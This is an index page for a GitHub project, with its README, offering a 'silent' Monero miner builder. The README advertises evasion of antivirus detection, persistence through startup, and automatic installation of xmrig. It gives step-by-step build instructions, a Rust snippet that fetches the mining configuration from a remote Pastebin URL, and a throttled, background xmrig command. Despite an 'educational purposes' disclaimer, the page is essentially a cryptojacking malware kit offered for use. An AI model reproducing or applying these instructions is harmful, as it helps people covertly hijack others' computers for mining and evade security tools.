Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nllemain/silent-xmr-miner-builder
Silent XMR Miner Builder how to build tutorial on the streamable please star if you like
https://github.com/nllemain/silent-xmr-miner-builder
free free-builder free-silent-miner free-silent-miner-builder free-xmr-silent-miner free-xmr-silent-minerbuilder hidden-miner lowdetection monero monero-mining silent-miner silentminer silentminer-builder watchdog xmr xmr-silentminer-builder xmrig xmrig-silent
Last synced: 3 days ago
JSON representation
Silent XMR Miner Builder how to build tutorial on the streamable please star if you like
- Host: GitHub
- URL: https://github.com/nllemain/silent-xmr-miner-builder
- Owner: NLlemain
- Created: 2024-12-19T14:45:54.000Z (3 days ago)
- Default Branch: main
- Last Pushed: 2024-12-19T15:28:24.000Z (3 days ago)
- Last Synced: 2024-12-19T16:22:11.002Z (3 days ago)
- Topics: free, free-builder, free-silent-miner, free-silent-miner-builder, free-xmr-silent-miner, free-xmr-silent-minerbuilder, hidden-miner, lowdetection, monero, monero-mining, silent-miner, silentminer, silentminer-builder, watchdog, xmr, xmr-silentminer-builder, xmrig, xmrig-silent
- Language: Rust
- Homepage: https://streamable.com/3n33kh
- Size: 32.2 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Silent XMR Miner Builder
Welcome to the **Silent XMR Miner Builder**! This tool lets you create a silent miner for Monero (XMR), which runs quietly in the background and is designed to avoid detection by security software. The builder allows you to customize and build your own miner executable, which you can configure to mine using your specific xmrig commands.
## Features:
- **Startup**: It adds miner to startup.
- **Instalation**: Intsalls xmrrig if not yet intsalled.
- **3 Detection on virus tottal**: [https://www.virustotal.com/gui/file/fe23ce5ded67a1c139300b3068166dccf0bcd8c2350e3b882a4e756473651d57](https://www.virustotal.com/gui/file/fe23ce5ded67a1c139300b3068166dccf0bcd8c2350e3b882a4e756473651d57)
- **Free to Use**: The miner builder is open-source and available at no cost.
- **Custom Configuration**: Users must create their own xmrrig configuration.## Prerequisites:
To build and run this project, you need to have **Rust** installed.### Installing Rust:
1. **Download and Install Rust**:
- Go to the official Rust installation page: [https://www.rust-lang.org/tools/install](https://www.rust-lang.org/tools/install).
- Follow the instructions for your operating system. Rust can be installed via **rustup**, a tool that helps manage Rust versions and associated tools.
## Verify Installation:After installation, check that Rust is installed properly by running this command:
```bash
rustc --version
```
You should see something like this:```bash
rustc 1.65.0 (897e37553 2022-11-02)
```
### Clone the Repository:First, clone this repository to your local machine using Git and navigate into the project directory.
```bashgit clone https://github.com/yourusername/silent-xmr-miner.git
cd silent-xmr-miner
```### Create Your Pastebin:
Go to Pastebin and create a new paste with your XMRig mining command. This will include things like the pool address and your wallet address.
Once your paste is created, copy the raw URL.
For example, your URL might look like this:
`https://pastebin.com/raw/yourpastebinid`
command should look like this
```bash
-o xmr-eu1.nanopool.org:10343 -a rx -k --tls -u youraddress.nameyouwant -p x --cpu-priority 1 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --background --cpu-affinity 1 --max-cpu-usage 35
```### Update the Code:
Open the source code file and replace the URL in the specified line with your own Pastebin link.
```bash
let process_config = client.get("https://pastebin.com/raw/yourpastebinid")
.send()
.unwrap()
.text()
.unwrap_or_default();
```### Build the Project:
In the terminal, inside the project directory, run the build command to compile the project in release mode.
```bash
cargo build --release
```## A Few Important Things to Keep in Mind:
- **Customization**: Make sure your Pastebin contains the correct configuration for XMRig to mine with your pool address and wallet.
- **Be Responsible**: Only use this tool on systems where you have permission to run mining software.## Disclaimer:
This tool is provided as-is, and it’s for educational purposes only. Please use it responsibly and make sure you have permission to mine on the system you’re using.